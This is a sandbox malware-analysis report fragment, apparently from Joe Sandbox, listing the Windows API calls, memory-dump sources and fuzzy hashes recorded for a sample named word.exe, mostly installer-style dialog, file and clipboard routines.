                                                          • Opcode Fuzzy Hash: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                                          • Instruction Fuzzy Hash: 2FE04F72B001696ADB903AF18F8DD7F21597B84304F15067EF611B62C2D9BC0D81A2B9
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025ED
                                                            • Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: 6d04ba6cf2fc6a85b27f9d7cfe527d6dfc931eb18d9fe9c26450760e99d2a917
                                                          • Instruction ID: e3c9d548799916fc1e7ab0b1e8fbae79452bd5b72cf6fc21fc218063dca289f2
                                                          • Opcode Fuzzy Hash: 6d04ba6cf2fc6a85b27f9d7cfe527d6dfc931eb18d9fe9c26450760e99d2a917
                                                          • Instruction Fuzzy Hash: 56E04FB6A04220BBDB01BBA55E4ADBF67A8DB60309B14853BF501F00C1C7BC49019A2E
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(00000000,00000421,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
                                                          • Instruction ID: 087740a894708ae54e311fe38564fcb001a0ed9e3d0f4d4a62d19f1d4de25a1d
                                                          • Opcode Fuzzy Hash: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
                                                          • Instruction Fuzzy Hash: 38E046B6250108AADB40EFA4EE4AF9537ECFB04700F008021BA08E7091CA78E5509B69
                                                          APIs
                                                          • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128A0,0040A8A0,004031C9,00409130,00409130,004030BB,004128A0,00004000,?,00000000,?), ref: 00405A0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                                          • Instruction ID: b1acdbea0b5305796381949641a39caa05877223dc774253bf026a704a199e6f
                                                          • Opcode Fuzzy Hash: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                                          • Instruction Fuzzy Hash: 3AE0E632714159ABDF109E559C41FEB779CEF05350F044532F915E6150E231E8219FA5
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(1000404C,?,?,1000403C), ref: 1000272D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_word.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                          • Instruction ID: 4dab7c069dd6fc30f8915db09394f7f991a1b088a201bba37056324bf7fcc065
                                                          • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                          • Instruction Fuzzy Hash: 98F09BF19092A0DEF360DF688CC47063FE4E3993D5B03852AE358F6269EB7441448B19
                                                          APIs
                                                          • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileString
                                                          • String ID:
                                                          • API String ID: 1096422788-0
                                                          • Opcode ID: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
                                                          • Instruction ID: 1024819f7f1d2ea578916dba6ac29c28ac22902c13986e1de9ff5d702d2d6265
                                                          • Opcode Fuzzy Hash: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
                                                          • Instruction Fuzzy Hash: B9E08671A44209BADB406FA08E09EBD3668BF01710F10013AF9507B0D1EBB88442F72D
                                                          APIs
                                                          • SetFileAttributesA.KERNELBASE(00000000,?,?), ref: 004015A0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 73dd263cc16519303ec7764465a471deb27e32fa1ac2c7a341e96c07e1019198
                                                          • Instruction ID: bed2877986d8c12a83e01492d596720214e57a472dec7050afa6ab6fccae40cd
                                                          • Opcode Fuzzy Hash: 73dd263cc16519303ec7764465a471deb27e32fa1ac2c7a341e96c07e1019198
                                                          • Instruction Fuzzy Hash: 17D01277B08114E7DB00DBB5AE48A9E73A4FB50325F208637D111F11D0D3B98551A629
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                          • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                          • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                          • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 89a3138968292bab01d7131142a88cb84c5e6bf95ef28c2e228963085d41211d
                                                          • Instruction ID: 4daead48d26ae6742cc4751adb680189456718570d67c7320b978f12710e1ab5
                                                          • Opcode Fuzzy Hash: 89a3138968292bab01d7131142a88cb84c5e6bf95ef28c2e228963085d41211d
                                                          • Instruction Fuzzy Hash: DFD0C7B7B141006BD750E7B86E8545A73E8F75135A7148837D502E1191D17DC9415519
                                                          APIs
                                                          • CharNextA.USER32(?,004032C4,"C:\Users\user\Desktop\word.exe",00000020), ref: 004057B9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharNext
                                                          • String ID:
                                                          • API String ID: 3213498283-0
                                                          • Opcode ID: cab86ad4fbbc926bf9d9c4068ad28f349fd9e0cffecbcadba0a0645dfc6f61bb
                                                          • Instruction ID: 89ef04895189e0a570f69afc6b3983d50e9fc015b7b22d5900b2b0617734604f
                                                          • Opcode Fuzzy Hash: cab86ad4fbbc926bf9d9c4068ad28f349fd9e0cffecbcadba0a0645dfc6f61bb
                                                          • Instruction Fuzzy Hash: B5C0803440D784E7E520471054245677FF0AB51701F14845AF0C163151D134B840AF16
                                                          APIs
                                                          • GlobalAlloc.KERNELBASE(?,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_word.jbxd
                                                          Similarity
                                                          • API ID: AllocGlobal
                                                          • String ID:
                                                          • API String ID: 3761449716-0
                                                          • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                          • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                                          • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                          • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404971
                                                          • GetDlgItem.USER32(?,00000408), ref: 0040497C
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 004049C6
                                                          • LoadBitmapA.USER32(0000006E), ref: 004049D9
                                                          • SetWindowLongA.USER32(?,?,00404F50), ref: 004049F2
                                                          • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404A06
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A18
                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404A2E
                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A3A
                                                          • SendMessageA.USER32(?,0000111B,?,00000000), ref: 00404A4C
                                                          • DeleteObject.GDI32(00000000), ref: 00404A4F
                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A7A
                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A86
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B1B
                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B46
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B5A
                                                          • GetWindowLongA.USER32(?,?), ref: 00404B89
                                                          • SetWindowLongA.USER32(?,?,00000000), ref: 00404B97
                                                          • ShowWindow.USER32(?,00000005), ref: 00404BA8
                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CA5
                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D0A
                                                          • SendMessageA.USER32(?,?,00000000,00000000), ref: 00404D1F
                                                          • SendMessageA.USER32(?,00000420,00000000,?), ref: 00404D43
                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D63
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D78
                                                          • GlobalFree.KERNEL32(?), ref: 00404D88
                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E01
                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404EAA
                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EB9
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404ED9
                                                          • ShowWindow.USER32(?,00000000), ref: 00404F27
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F32
                                                          • ShowWindow.USER32(00000000), ref: 00404F39
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $+/R$M$N
                                                          • API String ID: 1638840714-1472796484
                                                          • Opcode ID: 053b7ab7fa00b04d0007377cc01b8b92edfe404da863458ea4911086e25be11d
                                                          • Instruction ID: 292d5c244ab645820c7f02bed8ff3f2a610eed88cba0887a0da166436049191d
                                                          • Opcode Fuzzy Hash: 053b7ab7fa00b04d0007377cc01b8b92edfe404da863458ea4911086e25be11d
                                                          • Instruction Fuzzy Hash: A10250B0900209AFEF109F54DC85AAE7BB5FB84315F10817AFA11B62E1D7789E42DF58
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 0040517A
                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405189
                                                          • GetClientRect.USER32(?,?), ref: 004051C6
                                                          • GetSystemMetrics.USER32(00000015), ref: 004051CE
                                                          • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051EF
                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405200
                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405213
                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405221
                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405234
                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405256
                                                          • ShowWindow.USER32(?,?), ref: 0040526A
                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040528B
                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040529B
                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052B4
                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052C0
                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405198
                                                            • Part of subcall function 00404021: SendMessageA.USER32(?,?,00000001,00403E52), ref: 0040402F
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052DC
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000050AE,00000000), ref: 004052EA
                                                          • CloseHandle.KERNEL32(00000000), ref: 004052F1
                                                          • ShowWindow.USER32(00000000), ref: 00405314
                                                          • ShowWindow.USER32(?,?), ref: 0040531B
                                                          • ShowWindow.USER32(?), ref: 00405361
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405395
                                                          • CreatePopupMenu.USER32 ref: 004053A6
                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053BB
                                                          • GetWindowRect.USER32(?,000000FF), ref: 004053DB
                                                          • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 004053F4
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405430
                                                          • OpenClipboard.USER32(00000000), ref: 00405440
                                                          • EmptyClipboard.USER32 ref: 00405446
                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 0040544F
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405459
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040546D
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405486
                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00405491
                                                          • CloseClipboard.USER32 ref: 00405497
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID:
                                                          • API String ID: 590372296-0
                                                          • Opcode ID: 3a7fd544d37bc8c1aecbdfced25bc3ec019ee290ee59522c4131774be6385cee
                                                          • Instruction ID: 0982c58dd6aff3abb9cbe356e138a5b54def650ce905af7e846a86ee5d5c2f58
                                                          • Opcode Fuzzy Hash: 3a7fd544d37bc8c1aecbdfced25bc3ec019ee290ee59522c4131774be6385cee
                                                          • Instruction Fuzzy Hash: 43A15BB1900208BFDB219FA0DD89AAE7F79FB08345F00407AFA04B61A0C7B55E51DF69
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404479
                                                          • SetWindowTextA.USER32(00000000,?), ref: 004044A3
                                                          • SHBrowseForFolderA.SHELL32(?,0041F0D0,?), ref: 00404554
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040455F
                                                          • lstrcmpiA.KERNEL32(Call,0041FCF8), ref: 00404591
                                                          • lstrcatA.KERNEL32(?,Call), ref: 0040459D
                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045AF
                                                            • Part of subcall function 004054E9: GetDlgItemTextA.USER32(?,?,00000400,004045E6), ref: 004054FC
                                                            • Part of subcall function 00405F5C: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\word.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FB4
                                                            • Part of subcall function 00405F5C: CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
                                                            • Part of subcall function 00405F5C: CharNextA.USER32(?,"C:\Users\user\Desktop\word.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FC6
                                                            • Part of subcall function 00405F5C: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FD6
                                                          • GetDiskFreeSpaceA.KERNEL32(0041ECC8,?,?,0000040F,?,0041ECC8,0041ECC8,?,00000000,0041ECC8,?,?,000003FB,?), ref: 0040466A
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404685
                                                          • SetDlgItemTextA.USER32(00000000,00000400,0041ECB8), ref: 004046FE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
